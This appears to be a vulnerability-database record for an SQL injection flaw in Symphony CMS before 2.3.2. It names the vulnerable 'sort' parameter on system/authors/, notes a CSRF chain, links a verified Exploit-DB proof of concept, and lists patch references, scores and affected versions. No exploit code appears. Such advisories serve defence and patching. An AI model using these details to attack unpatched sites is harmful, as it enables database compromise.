Description
SQL injection vulnerability in Symphony CMS before 2.3.2 allows remote authenticated users to execute arbitrary SQL commands via the sort parameter to system/authors/. NOTE: this can be leveraged using CSRF to allow remote unauthenticated attackers to execute arbitrary SQL commands.
Exploits (1)
exploitdb
WORKING POC
VERIFIED
by High-Tech Bridge · textwebappsphp
https://www.exploit-db.com/exploits/38417
References (6)
Core 6
Core References
Third Party Advisory, VDB Entry vdb-entry
x_refsource_xf
https://exchange.xforce.ibmcloud.com/vulnerabilities/83227
Exploit mailing-list
x_refsource_bugtraq
http://archives.neohapsis.com/archives/bugtraq/2013-04/0018.html
Exploit x_refsource_misc
https://www.htbridge.com/advisory/HTB23148
Third Party Advisory, VDB Entry vdb-entry
x_refsource_bid
http://www.securityfocus.com/bid/58843
Exploit, Patch x_refsource_confirm
https://github.com/symphonycms/symphony-2/commit/6c8aa4e9c810994f7632837487426867ce50f468
Patch x_refsource_confirm
http://www.getsymphony.com/download/releases/version/2.3.2
Scores
EPSS
0.0115
EPSS Percentile
78.6%
Details
CWE
CWE-89
Status
published
Products (10)
getsymphony/symphony
2.0
getsymphony/symphony
2.0.3
getsymphony/symphony
2.0.4
getsymphony/symphony
2.0.5
getsymphony/symphony
2.0.6
getsymphony/symphony
2.0.7
getsymphony/symphony
2.1.0
getsymphony/symphony
2.1.1
getsymphony/symphony
2.3
getsymphony/symphony
< 2.3.1
Published
Mar 27, 2014
Tracked Since
Feb 18, 2026